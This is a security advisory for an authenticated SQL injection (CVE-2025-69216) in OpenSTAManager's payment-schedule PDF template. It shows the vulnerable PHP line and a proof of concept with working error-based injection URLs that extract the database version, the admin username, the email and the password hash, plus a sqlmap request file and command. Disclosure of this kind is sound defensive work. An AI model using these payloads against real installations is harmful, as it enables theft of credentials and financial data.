CVE-2025-69216
Summary
An authenticated SQL Injection vulnerability in OpenSTAManager's Scadenzario (Payment Schedule) print template allows any authenticated user to extract sensitive data from the database, including admin credentials, customer information, and financial records. The vulnerability enables complete database read access through error-based SQL injection techniques.
Details
The vulnerability exists in templates/scadenzario/init.php at line 46, where the id_anagrafica parameter is directly concatenated into an SQL query without proper sanitization:
Vulnerable Code:
if (get('id_anagrafica') && get('id_anagrafica') != 'null') {
$module_query = str_replace('1=1', '1=1 AND `co_scadenziario`.`idanagrafica`="'.get('id_anagrafica').'"', $module_query);
$id_anagrafica = get('id_anagrafica');
}The get() function retrieves user input from GET/POST parameters without validation. The parameter value is directly embedded into the SQL query string using string concatenation instead of using the application's prepare() sanitization function, enabling SQL Injection attacks.
Root Cause:
- Missing use of
prepare()function for input sanitization - Direct string concatenation in SQL query construction
- No input validation or type checking
Affected Endpoint:
/pdfgen.php?ptype=scadenzario&id_anagrafica=[INJECTION_PAYLOAD]Affected Files:
templates/scadenzario/init.php(line 46) - Primary vulnerabilitytemplates/scadenzario/init.php(lines 34, 40) - Similar pattern with date parameterspdfgen.php- Entry point for template rendering
---
PoC (Proof of Concept)
Prerequisites
- Valid authenticated session (any user role)
Exploitation Steps
1. Confirm Vulnerability - Basic Syntax Error Test:
http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20--%20SQL syntax error displayed in application response
<img width="2195" height="392" alt="image" src="https://github.com/user-attachments/assets/f62ca7b4-2397-4f90-8698-6cf7f867d102" />
---
2. Extract Database Version - Error-Based SQLi:
http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,VERSION(),0x7e))%20AND%20%221%22=%221Result: ~8.3.0~ (MySQL version)
<img width="2061" height="378" alt="image" src="https://github.com/user-attachments/assets/8ea16c47-36cc-4c25-a624-b42ccfcdf52f" />
---
3. Extract Database Name:
http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,database(),0x7e))%20AND%20%221%22=%221Result: ~openstamanager~
<img width="1954" height="345" alt="image" src="https://github.com/user-attachments/assets/47479297-5271-4c03-b242-efa513eb28f8" />
---
4. Extract Admin Username:
http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20username%20FROM%20zz_users%20LIMIT%201),0x7e))%20AND%20%221%22=%221Result: ~admin~
<img width="1998" height="332" alt="image" src="https://github.com/user-attachments/assets/9f8363cb-8da9-4e8f-8744-ef38c9706be8" />
---
5. Extract Admin Email:
http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20email%20FROM%20zz_users%20LIMIT%201),0x7e))%20AND%20%221%22=%221Result: Admin email address
<img width="2006" height="339" alt="image" src="https://github.com/user-attachments/assets/4dcd5ea4-4eea-4730-8d39-b8ce2da46e84" />
---
6. Extract Password Hash (Partial - XPATH 31 char limit):
http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20password%20FROM%20zz_users%20LIMIT%201),0x7e))%20AND%20%221%22=%221Result: bcrypt password hash
<img width="1924" height="328" alt="image" src="https://github.com/user-attachments/assets/27b711f3-9bb6-4909-a5bd-a04177c9f219" />
---
7. Automated Exploitation with SQLMap:
Create request file sqli_osm.req:
GET /pdfgen.php?ptype=scadenzario&id_anagrafica=1* HTTP/1.1
Host: localhost:8081
Cookie: PHPSESSID=[SESSION_COOKIE]
User-Agent: Mozilla/5.0Run SQLMap:
sqlmap -r sqli_osm.req --level 3 --risk 3 --dbsSQLMap Confirmed Injection Types:
- ✅ Boolean-based blind SQL injection
- ✅ Error-based SQL injection (MySQL >= 5.6 GTID_SUBSET)
- ✅ Time-based blind SQL injection (SLEEP)
<img width="1498" height="516" alt="image" src="https://github.com/user-attachments/assets/b733f025-ac4b-4b36-a20e-76d826005f62" />
---
Impact
Who is Impacted:
- ✅ All authenticated users - Any user with valid credentials can exploit this vulnerability
- ✅ Low-privilege users - Even users with minimal permissions can access admin-level data
- ✅ All OpenSTAManager installations - Vulnerability exists in the latest master branch
---
Attribution
Reported by Łukasz Rybak
Package Versions Affected
Automatically patch vulnerabilities without upgrading
CVSS Version
Related Resources
References
https://github.com/devcode-it/openstamanager/security/advisories/GHSA-q6g3-fv43-m2w6, https://nvd.nist.gov/vuln/detail/CVE-2025-69216, https://github.com/devcode-it/openstamanager
Basic Information
